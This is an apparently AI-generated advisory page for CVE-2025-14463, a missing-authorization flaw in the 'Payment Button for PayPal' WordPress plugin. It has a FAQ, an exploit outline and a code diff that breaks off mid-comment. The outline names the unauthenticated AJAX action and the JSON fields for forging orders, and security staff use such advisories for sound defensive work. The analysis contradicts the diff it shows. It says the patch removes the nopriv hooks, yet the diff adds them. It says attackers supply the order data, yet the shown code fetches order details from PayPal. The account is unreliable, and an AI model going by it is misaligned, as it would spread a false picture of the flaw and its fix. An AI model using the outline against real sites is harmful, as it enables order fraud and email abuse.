What is CVE-2025-14463?

CVE-2025-14463 is a security vulnerability in the Payment Button for PayPal plugin for WordPress, affecting versions up to and including 1.2.3.41. It allows unauthenticated attackers to create arbitrary orders due to a missing authorization check on a public AJAX endpoint.

How does this vulnerability work?

The vulnerability exists because the plugin exposes an AJAX endpoint that processes checkout results without authentication. Attackers can send crafted POST requests to this endpoint, creating fake orders with any transaction details they choose.

Who is affected by this vulnerability?

Any WordPress site using the Payment Button for PayPal plugin version 1.2.3.41 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and locate the Payment Button for PayPal plugin. If the version is 1.2.3.41 or earlier, your site is vulnerable.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the Payment Button for PayPal plugin to version 1.2.3.42 or later, where the issue has been patched. Regularly updating plugins is crucial for maintaining site security.

What does the severity rating mean?

CVE-2025-14463 has a CVSS score of 5.3, which is considered medium severity. This indicates that while the vulnerability does not allow for complete site takeover, it can lead to significant issues such as unauthorized order creation and potential fraud.

What are the risks of not addressing this vulnerability?

Failing to address this vulnerability can result in unauthorized orders being created in your site’s database, leading to data corruption, fraudulent transactions, and potential disruption of business operations.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, including malicious data that mimics a legitimate PayPal order. This illustrates the ease with which the vulnerability can be exploited.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Payment Button for PayPal plugin until you can apply the patch. Additionally, monitor your site’s order database for any suspicious activity.

Are there any other security measures I should take?

In addition to updating vulnerable plugins, ensure you have security plugins installed, conduct regular security audits, and implement strong user authentication practices to further protect your WordPress site.

Where can I find more information about this vulnerability?

Detailed information about CVE-2025-14463 can be found in the official CVE database and security advisories related to the Payment Button for PayPal plugin. Regularly check these resources for updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14463: Payment Button for PayPal <= 1.2.3.41 – Missing Authorization to Unauthenticated Arbitrary Order Creation (wp-paypal)

CVE ID CVE-2025-14463

Plugin wp-paypal

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.2.3.41

Patched Version 1.2.3.42

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14463:
The Payment Button for PayPal WordPress plugin, versions up to and including 1.2.3.41, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to create arbitrary orders in the site’s database. The vulnerability stems from a publicly accessible AJAX endpoint that processes PayPal checkout results without verifying user authentication or the legitimacy of the transaction data.

Atomic Edge research identifies the root cause as the plugin’s registration of the `wp_paypal_checkout_process_order_handler` function to the `wp_paypal_checkout_process_order` action. This action is called from the `wp_paypal_checkout_pp_api_capture_order` function, which is itself exposed as a public AJAX handler via the `wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order` hook in the file `wp-paypal/wp-paypal-checkout-api.php`. The handler function creates a WordPress post of type `wp_paypal_order` and populates its metadata using attacker-controlled data from the `order_details_data` array, which is derived from the POST request’s `data` parameter. No capability checks or nonce verification protect this endpoint.

An attacker exploits this by sending a direct POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wppaypalcheckout_pp_api_capture_order`. The request must include a `data` parameter containing a JSON object that mimics a PayPal order capture response. This JSON object includes fields like `order_id`, `payer` (with `email_address`, `name`), `purchase_units` (with `description`, `amount`), and `payments.captures` (with `id`, `status`). The attacker can specify any transaction ID, payment amount, product description, customer name, and email address. The plugin will process this fabricated data as a legitimate order.

The patch addresses the vulnerability by removing the `wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order` hook registration. This change restricts the `wppaypalcheckout_pp_api_capture_order` AJAX endpoint to authenticated users only. The patched code also removes the `wp_ajax_nopriv_wppaypalcheckout_pp_api_create_order` hook, but the core vulnerability was in the capture endpoint which directly triggered order creation. The before state allowed any site visitor to call the endpoint. The after state requires a valid WordPress user session, aligning with the principle of least privilege.

Successful exploitation corrupts the order database with fraudulent entries, potentially disrupting business records and analytics. If the plugin’s email functionality is enabled, the attack triggers purchase receipt emails to any address supplied in the `payer.email_address` field, leading to unauthorized email dispatch and potential spam or phishing vectors. Attackers can also pollute the database with arbitrary data via the `custom` and `variation` fields. This vulnerability does not directly lead to site takeover or code execution, but it enables fraud and denial-of-service against the order management system.

Differential between vulnerable and patched code

Code Diff

--- a/wp-paypal/wp-paypal-checkout-api.php
+++ b/wp-paypal/wp-paypal-checkout-api.php
@@ -0,0 +1,638 @@
+<?php
+add_action('wp_ajax_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
+add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_create_order', 'wp_paypal_checkout_pp_api_create_order');
+add_action('wp_ajax_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');
+add_action('wp_ajax_nopriv_wppaypalcheckout_pp_api_capture_order', 'wp_paypal_checkout_pp_api_capture_order');
+add_action('wp_paypal_checkout_process_order', 'wp_paypal_checkout_process_order_handler', 10, 2);
+
+function wp_paypal_checkout_pp_api_create_order(){
+    //The data will be in JSON format string (not actual JSON object). By using json_decode it can be converted to a json object or array.
+    $json_order_data = isset($_POST['data']) ? stripslashes_deep($_POST['data']) : '{}';
+    $order_data_array = json_decode($json_order_data, true);
+    $encoded_item_description = isset($order_data_array['purchase_units'][0]['description']) ? $order_data_array['purchase_units'][0]['description'] : '';
+    $decoded_item_description = html_entity_decode($encoded_item_description);
+    wp_paypal_debug_log("Checkout - Create-order request received for item: ".$decoded_item_description, true);
+
+    //Set this decoded item name back to the order data.
+    $order_data_array['purchase_units'][0]['description'] = $decoded_item_description;
+    wp_paypal_debug_log_array($order_data_array, true);
+    if(empty($json_order_data)){
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty data received.', 'wp-paypal'),
+            )
+        );
+    }
+    $options = wp_paypal_checkout_get_option();
+    $currency_code = $options['currency_code'];
+    $description = $order_data_array['purchase_units'][0]['description'];
+    $amount = $order_data_array['purchase_units'][0]['amount']['value'];
+    $total_amount = $amount;
+    wp_paypal_debug_log("Checkout - Creating order data to send to PayPal: ", true);
+    $pp_api_order_data = [
+        "intent" => "CAPTURE",
+        "payment_source" => [
+            "paypal" => [
+                "experience_context" => [
+                    "payment_method_preference" => "IMMEDIATE_PAYMENT_REQUIRED",
+                ]
+            ]
+        ],
+        "purchase_units" => [
+            [
+                "description" => $description,
+                "amount" => [
+                    "value" => (string) $total_amount,
+                    "currency_code" => $currency_code,
+                ],
+            ]
+        ]
+    ];
+    //
+    $shipping_preference = '';
+    if(isset($order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'])
+            && !empty($order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'])){
+        $shipping_preference = $order_data_array['payment_source']['paypal']['experience_context']['shipping_preference'];
+        $pp_api_order_data['payment_source']['paypal']['experience_context']['shipping_preference'] = $shipping_preference;
+    }
+    //
+    $amount_breakdown = false;
+    //shipping
+    if(isset($order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'])
+            && is_numeric($order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'])
+                && $order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'] > 0){
+        $shipping = $order_data_array['purchase_units'][0]['amount']['breakdown']['shipping']['value'];
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['shipping']['currency_code'] = $currency_code;
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['shipping']['value'] = (string) $shipping;
+        $total_amount = $amount + $shipping;
+        $amount_breakdown = true;
+    }
+    //break down amount when needed
+    if($amount_breakdown){
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['item_total']['currency_code'] = $currency_code;
+        $pp_api_order_data['purchase_units'][0]['amount']['breakdown']['item_total']['value'] = (string) $amount;
+        $pp_api_order_data['purchase_units'][0]['amount']['value'] = (string) $total_amount;
+    }
+    //
+    $json_encoded_pp_api_order_data = wp_json_encode($pp_api_order_data);
+    wp_paypal_debug_log_array($json_encoded_pp_api_order_data, true);
+    $access_token = wp_paypal_checkout_get_paypal_access_token();
+    if (!$access_token) {
+        wp_paypal_debug_log('Checkout - Access token could not be created using PayPal API', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Checkout - Access token could not be created using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+        'body' => $json_encoded_pp_api_order_data
+    ));
+
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Checkout - Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg'  => __('Failed to create the order using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Checkout - Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    $data = json_decode($body);
+    if(!isset($data) || empty($data)){
+        wp_paypal_debug_log('Checkout - Invalid response data from PayPal API order creation', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response data from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from order creation', true);
+    wp_paypal_debug_log_array($data, true);
+    if(!isset($data->id) || empty($data->id)){
+        wp_paypal_debug_log('Checkout - No order ID from PayPal API order creation', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('No order ID from PayPal API order creation.', 'wp-paypal'),
+            )
+        );
+    }
+    $paypal_order_id = $data->id;
+    wp_send_json(
+        array(
+            'success' => true,
+            'order_id' => $paypal_order_id,
+            'additional_data' => array(),
+        )
+    );
+}
+
+function wp_paypal_checkout_get_paypal_access_token() {
+    $options = wp_paypal_checkout_get_option();
+    $url = 'https://api-m.paypal.com/v1/oauth2/token';
+    $client_id = $options['app_client_id'];
+    $secret_key = $options['app_secret_key'];
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v1/oauth2/token';
+        $client_id = $options['app_sandbox_client_id'];
+        $secret_key = $options['app_sandbox_secret_key'];
+    }
+    if(!isset($client_id) || empty($client_id)){
+        wp_paypal_debug_log('Checkout - No client ID. Access token cannot be created.', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    if(!isset($secret_key) || empty($secret_key)){
+        wp_paypal_debug_log('Checkout - No secret key. Access token cannot be created.', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $secret_key = base64_decode($secret_key);
+    $auth = base64_encode($client_id . ':' . $secret_key);
+    wp_paypal_debug_log('Creating access token', true);
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Basic ' . $auth,
+            'Content-Type' => 'application/x-www-form-urlencoded'
+        ),
+        'body' => 'grant_type=client_credentials'
+    ));
+
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to create an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body when creating an access token using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $data = json_decode($body);
+    wp_paypal_debug_log('Response data for access token', true);
+    wp_paypal_debug_log_array($data, true);
+    if(!isset($data->access_token) || empty($data->access_token)){
+        wp_paypal_debug_log('No valid access token from PayPal API response', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('No valid access token from PayPal API response.', 'wp-paypal'),
+            )
+        );
+    }
+
+    return $data->access_token;
+}
+
+function wp_paypal_checkout_pp_api_capture_order(){
+    $json_pp_bn_data = isset( $_POST['data'] ) ? stripslashes_deep( $_POST['data'] ) : '{}';
+    $array_pp_bn_data = json_decode( $json_pp_bn_data, true );
+    $order_id = isset( $array_pp_bn_data['order_id'] ) ? sanitize_text_field($array_pp_bn_data['order_id']) : '';
+    $checkoutvar = isset( $array_pp_bn_data['checkoutvar'] ) ? $array_pp_bn_data['checkoutvar'] : array();
+    wp_paypal_debug_log('Checkout - PayPal capture order request received - PayPal order ID: ' . $order_id, true);
+    if(empty($order_id)){
+        wp_paypal_debug_log('Checkout - Empty order ID received from PayPal capture order request', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Error! Empty order ID received for PayPal capture order request.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log("Creating data to send to PayPal for capturing the order: ", true);
+    $api_params = array( 'order_id' => $order_id );
+    $json_api_params = json_encode($api_params);
+    wp_paypal_debug_log_array($json_api_params, true);
+    $access_token = wp_paypal_checkout_get_paypal_access_token();
+    if (!$access_token) {
+        wp_paypal_debug_log('Checkout - Access token could not be created using PayPal API', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Access token could not be created using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $options = wp_paypal_checkout_get_option();
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $url .= '/'.$order_id.'/capture';
+    $response = wp_safe_remote_post($url, array(
+        'method' => 'POST',
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+        'body' => $json_api_params
+    ));
+    if (is_wp_error($response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to capture the order using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+
+    $body = wp_remote_retrieve_body($response);
+    if(!isset($body) || empty($body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from PayPal API order capture.', 'wp-paypal'),
+            )
+        );
+    }
+    $capture_response_data = json_decode($body, true);
+    if(!isset($capture_response_data) || empty($capture_response_data)){
+        wp_paypal_debug_log('Empty response data', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty response data from PayPal API order capture.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from order capture', true);
+    wp_paypal_debug_log_array($capture_response_data, true);
+    //
+    wp_paypal_debug_log('Checkout - Retrieving order details', true);
+    $url = 'https://api-m.paypal.com/v2/checkout/orders';
+    if(isset($options['test_mode']) && $options['test_mode'] == "1"){
+        $url = 'https://api-m.sandbox.paypal.com/v2/checkout/orders';
+    }
+    $url .= '/'.$order_id;
+    $order_response = wp_safe_remote_get($url, array(
+        'headers' => array(
+            'Authorization' => 'Bearer ' . $access_token,
+            'Content-Type' => 'application/json'
+        ),
+    ));
+    if (is_wp_error($order_response)) {
+        wp_paypal_debug_log('Error response', false);
+        wp_paypal_debug_log_array($order_response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Failed to retrieve order details using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $order_body = wp_remote_retrieve_body($order_response);
+    if(!isset($order_body) || empty($order_body)){
+        wp_paypal_debug_log('Error response from invalid body', false);
+        wp_paypal_debug_log_array($order_response, false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Invalid response body from retrieving order details using PayPal API.', 'wp-paypal'),
+            )
+        );
+    }
+    $order_details_data = json_decode($order_body, true);
+    if(!isset($order_details_data) || empty($order_details_data)){
+        wp_paypal_debug_log('Empty response data from retrieving order details', false);
+        wp_send_json(
+            array(
+                'success' => false,
+                'err_msg' => __('Empty response data from PayPal API order details.', 'wp-paypal'),
+            )
+        );
+    }
+    wp_paypal_debug_log('Response data from retrieving order details', true);
+    wp_paypal_debug_log_array($order_details_data, true);
+    //
+    do_action('wp_paypal_checkout_process_order', $order_details_data, $checkoutvar);
+    wp_send_json_success();
+}
+
+function wp_paypal_checkout_process_order_handler($order_details_data, $checkoutvar)
+{
+    if(!isset($order_details_data['payer'])){
+        wp_paypal_debug_log("Checkout - No payer data. This payment cannot be processed.", false);
+        return;
+    }
+    $payer = $order_details_data['payer'];
+    if(!isset($order_details_data['purchase_units'][0])){
+        wp_paypal_debug_log("Checkout - No purchase unit data. This payment cannot be processed.", false);
+        return;
+    }
+    $purchase_units = $order_details_data['purchase_units'][0];
+    if(!isset($purchase_units['payments']['captures'][0])){
+        wp_paypal_debug_log("Checkout - No payment capture data. This payment cannot be processed.", false);
+        return;
+    }
+    $capture = $purchase_units['payments']['captures'][0];
+    $payment_status = '';
+    if (isset($capture['status'])) {
+        $payment_status = sanitize_text_field($capture['status']);
+        wp_paypal_debug_log("Checkout - Payment Status - " . $payment_status, true);
+    }
+    if (isset($capture['status']['status_details']['reason'])) {
+        $status_reason = sanitize_text_field($capture['status']['status_details']['reason']);
+        wp_paypal_debug_log("Checkout - Reason - " . $status_reason, true);
+    }
+    $payment_data = array();
+    $payment_data['txn_id'] = '';
+    if (isset($capture['id'])) {
+        $payment_data['txn_id'] = sanitize_text_field($capture['id']);
+    } else {
+        wp_paypal_debug_log("Checkout - No transaction ID. This payment cannot be processed.", false);
+        return;
+    }
+    $args = array(
+        'post_type' => 'wp_paypal_order',
+        'meta_query' => array(
+            array(
+                'key' => '_txn_id',
+                'value' => $payment_data['txn_id'],
+                'compare' => '=',
+            ),
+        ),
+    );
+    $query = new WP_Query($args);
+    if ($query->have_posts()) {  //a record already exists
+        wp_paypal_debug_log("Checkout - An order with this transaction ID already exists. This payment will not be processed.", false);
+        return;
+    }
+    $payer_name = '';
+    $payment_data['given_name'] = '';
+    $payment_data['first_name'] = '';
+    if (isset($payer['name']['given_name'])) {
+        $payment_data['given_name'] = sanitize_text_field($payer['name']['given_name']);
+        $given_name_parts = explode(" ", $payment_data['given_name']);
+        if(isset($given_name_parts[0]) && !empty($given_name_parts[0])){
+            $payment_data['first_name'] = sanitize_text_field($given_name_parts[0]);
+        }
+        $payer_name .= $payment_data['given_name'];
+    }
+    $payment_data['last_name'] = '';
+    if (isset($payer['name']['surname'])) {
+        $payment_data['last_name'] = sanitize_text_field($payer['name']['surname']);
+        $payer_name .= ' '.$payment_data['last_name'];
+    }
+    $payment_data['payer_email'] = '';
+    if (isset($payer['email_address'])) {
+        $payment_data['payer_email'] = sanitize_email($payer['email_address']);
+    }
+    $payment_data['item_names'] = '';
+    $payment_data['description'] = '';
+    if (isset($purchase_units['description'])) {
+        $payment_data['description'] = sanitize_text_field($purchase_units['description']);
+        $payment_data['item_names'] = $payment_data['description'];
+    }
+    $payment_data['mc_gross'] = '';
+    if (isset($purchase_units['amount']['value'])) {
+        $payment_data['mc_gross'] = sanitize_text_field($purchase_units['amount']['value']);
+    }
+    $payment_data['currency_code'] = '';
+    if (isset($purchase_units['amount']['currency_code'])) {
+        $payment_data['currency_code'] = sanitize_text_field($purchase_units['amount']['currency_code']);
+    }
+    $payment_data['custom'] = '';
+    if (isset($checkoutvar['custom']) && !empty($checkoutvar['custom'])) {
+        $payment_data['custom'] = sanitize_text_field($checkoutvar['custom']);
+    }
+    $payment_data['variation'] = '';
+    if (isset($checkoutvar['variation']) && !empty($checkoutvar['variation'])) {
+        $payment_data['variation'] = sanitize_text_field($checkoutvar['variation']);
+    }
+    $payment_data['shipping_name'] = '';
+    if (isset($purchase_units['shipping']['name'])) {
+        $payment_data['shipping_name'] = isset($purchase_units['shipping']['name']['full_name']) ? sanitize_text_field($purchase_units['shipping']['name']['full_name']) : '';
+    }
+    $ship_to = '';
+    $shipping_address = '';
+    if (isset($purchase_units['shipping']['address'])) {
+        $address_street = isset($purchase_units['shipping']['address']['address_line_1']) ? sanitize_text_field($purchase_units['shipping']['address']['address_line_1']) : '';
+        $ship_to .= !empty($address_street) ? $address_street.'<br />' : '';
+        $shipping_address .= !empty($address_street) ? $address_street.', ' : '';
+
+        $address_city = isset($purchase_units['shipping']['address']['admin_area_2']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_2']) : '';
+        $ship_to .= !empty($address_city) ? $address_city.', ' : '';
+        $shipping_address .= !empty($address_city) ? $address_city.', ' : '';
+
+        $address_state = isset($purchase_units['shipping']['address']['admin_area_1']) ? sanitize_text_field($purchase_units['shipping']['address']['admin_area_1']) : '';
+        $ship_to .= !empty($address_state) ? $address_state.' ' : '';
+        $shipping_address .= !empty($address_state) ? $address_state.' ' : '';
+
+        $address_zip = isset($purchase_units['shipping']['address']['postal_code']) ? sanitize_text_field($purchase_units['shipping']['address']['postal_code']) : '';
+        $ship_to .= !empty($address_zip) ? $address_zip.'<br />' : '';
+        $shipping_address .= !empty($address_zip) ? $address_zip.', ' : '';
+
+        $address_country = isset($purchase_units['shipping']['address']['country_code']) ? sanitize_text_field($purchase_units['shipping']['address']['country_code']) : '';
+        $ship_to .= !empty($address_country) ? $address_country : '';
+        $shipping_address .= !empty($address_country) ? $address_country : '';
+    }
+    $payment_data['shipping_address'] = $shipping_address;
+    $wp_paypal_order = array(
+        'post_title' => 'order',
+        'post_type' => 'wp_paypal_order',
+        'post_content' => '',
+        'post_status' => 'publish',
+    );
+    wp_paypal_debug_log("Checkout - Inserting order information", true);
+    $post_id = wp_insert_post($wp_paypal_order, true);
+    if (is_wp_error($post_id)) {
+        wp_paypal_debug_log("Checkout - Error inserting order information: ".$post_id->get_error_message(), false);
+        return;
+    }
+    if (!$post_id) {
+        wp_paypal_debug_log("Checkout - Order information could not be inserted", false);
+        return;
+    }
+    $post_updated = false;
+    if ($post_id > 0) {
+        $post_content = '';
+        if(!empty($payment_data['description'])){
+            $post_content .= '<strong>Description:</strong> '.$payment_data['description'].'<br />';
+        }
+        if(isset($payment_data['custom']) && !empty($payment_data['custom'])){
+            $post_content .= '<strong>Custom:</strong> '.$payment_data['custom'].'<br />';
+        }
+        if(isset($payment_data['variation']) && !empty($payment_data['variation'])){
+            $post_content .= '<strong>Variation:</strong> '.$payment_data['variation'].'<br />';
+        }
+        if(!empty($payment_data['mc_gross'])){
+            $post_content .= '<strong>Amount:</strong> '.$payment_data['mc_gross'].'<br />';
+        }
+        if(!empty($payment_data['mc_currency'])){
+            $post_content .= '<strong>Currency:</strong> '.$payment_data['mc_currency'].'<br />';
+        }
+        if(!empty($payer_name)){
+            $post_content .= '<strong>Payer Name:</strong> '.$payer_name.'<br />';
+        }
+        if(!empty($payment_data['payer_email'])){
+            $post_content .= '<strong>Email:</strong> '.$payment_data['payer_email'].'<br />';
+        }
+        if(!empty($ship_to)){
+            $ship_to = '<h2>'.__('Ship To', 'wp-paypal').'</h2><br />'.$payment_data['shipping_name'].'<br />'.$ship_to.'<br />';
+        }
+        $post_content .= $ship_to;
+        $post_content .= '<h2>'.__('Payment Data', 'wp-paypal').'</h2><br />';
+        $post_content .= print_r($order_details_data, true);
+        $updated_post = array(
+            'ID' => $post_id,
+            'post_title' => $post_id,
+            'post_type' => 'wp_paypal_order',
+            'post_content' => $post_content
+        );
+        $updated_post_id = wp_update_post($updated_post, true);
+        if (is_wp_error($updated_post_id)) {
+            wp_paypal_debug_log("Checkout - Error updating order information: ".$updated_post_id->get_error_message(), false);
+            return;
+        }
+        if (!$updated_post_id) {
+            wp_paypal_debug_log("Checkout - Order information could not be updated", false);
+            return;
+        }
+        if ($updated_post_id > 0) {
+            $post_updated = true;
+        }
+    }
+    //save order information
+    if ($post_updated) {
+        update_post_meta($post_id, '_txn_id', $payment_data['txn_id']);
+        update_post_meta($post_id, '_first_name', $payment_data['first_name']);
+        update_post_meta($post_id, '_last_name', $payment_data['last_name']);
+        update_post_meta($post_id, '_payer_email', $payment_data['payer_email']);
+        update_post_meta($post_id, '_mc_gross', $payment_data['mc_gross']);
+        update_post_meta($post_id, '_payment_status', $payment_status);
+        update_post_meta($post_id, '_custom', $payment_data['custom']);
+        update_post_meta($post_id, '_payment_data', $payment_data);
+        wp_paypal_debug_log("Checkout - Order information updated", true);
+
+        $email_options = wp_paypal_get_email_option();
+        add_filter('wp_mail_from', 'wp_paypal_set_email_from');
+        add_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
+        $purchase_email_body = '';
+        if(isset($email_options['purchase_email_enabled']) && !empty($email_options['purchase_email_enabled']) && !empty($payment_data['payer_email'])){
+            $subject = $email_options['purchase_email_subject'];
+            $subject = wp_paypal_do_email_tags($payment_data, $subject);
+            $type = $email_options['purchase_email_type'];
+            $body = $email_options['purchase_email_body'];
+            $body = wp_paypal_do_email_tags($payment_data, $body);
+            if($type == "html"){
+                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
+            }
+            //
+            if(isset($body) && !empty($body)){
+                $purchase_email_body = $body;
+            }
+            //
+            wp_paypal_debug_log("Sending a purchase receipt email to ".$payment_data['payer_email'], true);
+            $mail_sent = wp_mail($payment_data['payer_email'], $subject, $body);
+            if($type == "html"){
+                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+            }
+            if($mail_sent == true){
+                wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
+            }
+            else{
+                wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
+            }
+        }
+        if(isset($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_enabled']) && !empty($email_options['sale_notification_email_recipient'])){
+            $subject = $email_options['sale_notification_email_subject'];
+            $subject = wp_paypal_do_email_tags($payment_data, $subject);
+            $type = $email_options['sale_notification_email_type'];
+            $body = $email_options['sale_notification_email_body'];
+            $body = wp_paypal_do_email_tags($payment_data, $body);
+            if($type == "html"){
+                add_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+                $body = apply_filters('wp_paypal_email_body_wpautop', true) ? wpautop($body) : $body;
+            }
+            //
+            if(isset($email_options['sale_notification_email_append_purchase_email']) && !empty($email_options['sale_notification_email_append_purchase_email'])){
+                $appended_content = PHP_EOL.PHP_EOL.'---Purchase Receipt Email---'.PHP_EOL.PHP_EOL;
+                if($type == "html"){
+                    $appended_content = wpautop($appended_content);
+                }
+                $appended_content .= $purchase_email_body;
+                $body .= $appended_content;
+            }
+            //
+            $email_recipients = explode(",", $email_options['sale_notification_email_recipient']);
+            foreach($email_recipients as $email_recipient){
+                $to = sanitize_email($email_recipient);
+                if(is_email($to)){
+                    wp_paypal_debug_log("Checkout - Sending a sale notification email to ".$to, true);
+                    $mail_sent = wp_mail($to, $subject, $body);
+                    if($mail_sent == true){
+                        wp_paypal_debug_log("Checkout - Email was sent successfully by WordPress", true);
+                    }
+                    else{
+                        wp_paypal_debug_log("Checkout - Email could not be sent by WordPress", false);
+                    }
+                }
+            }
+            if($type == "html"){
+                remove_filter('wp_mail_content_type', 'wp_paypal_set_html_email_content_type');
+            }
+        }
+        remove_filter('wp_mail_from', 'wp_paypal_set_email_from');
+        remove_filter('wp_mail_from_name', 'wp_paypal_set_email_from_name');
+
+        $order_details_data['post_order_id'] = $post_id;
+        do_action('wp_paypal_checkout_order_processed', $payment_data, $order_details_data);
+    } else {
+        wp_paypal_debug_log("Checkout - Order information could not be updated", false);
+        return;
+    }
+    wp_paypal_debug_log("Checkout - Payment processing completed", true, true);
+    return;
+}
--- a/wp-paypal/wp-paypal-checkout.php
+++ b/wp-paypal/wp-paypal-checkout.php
@@ -38,13 +38,9 @@
 	$cancel_output .= "let cancel_url = temp_cancel_url.replace('&', '&');";
         $cancel_output .= "window.location.replace(cancel_url);";
     }
-    $no_shipping = '';
-    if(isset($atts['no_shipping']) && $atts['no_shipping']=='1'){
-        $no_shipping .= <<<EOT
-        application_context: {
-            shipping_preference: "NO_SHIPPING",
-        },
-EOT;
+    $shipping_preference = 'GET_FROM_FILE';
+    if(isset($atts['shipping_preference']) && $atts['shipping_preference'] == 'NO_SHIPPING'){
+        $shipping_preference = 'NO_SHIPPING';
     }
     $width = '300';
     if(isset($atts['width']) && !empty($atts['width'])){
@@ -88,6 +84,12 @@
         return __('You need to provide a valid price amount', 'wp-paypal');
     }
     $amount = $atts['amount'];
+    $break_down_amount = 'false';
+    $shipping = '';
+    if(isset($atts['shipping']) && is_numeric($atts['shipping'])){
+        $shipping = $atts['shipping'];
+        $break_down_amount = 'true';
+    }
     $esc_js = 'esc_js';
     $additional_el = '';
     $button_id = 'wppaypalcheckout-button-'.$id;
@@ -128,6 +130,11 @@
     $button_code .= '<div id="'.esc_attr($button_id).'" style="'.esc_attr('max-width: '.$width.'px;').'"></div>';
     $button_code .= '</div>';
     $ajax_url = admin_url('admin-ajax.php');
+    /*
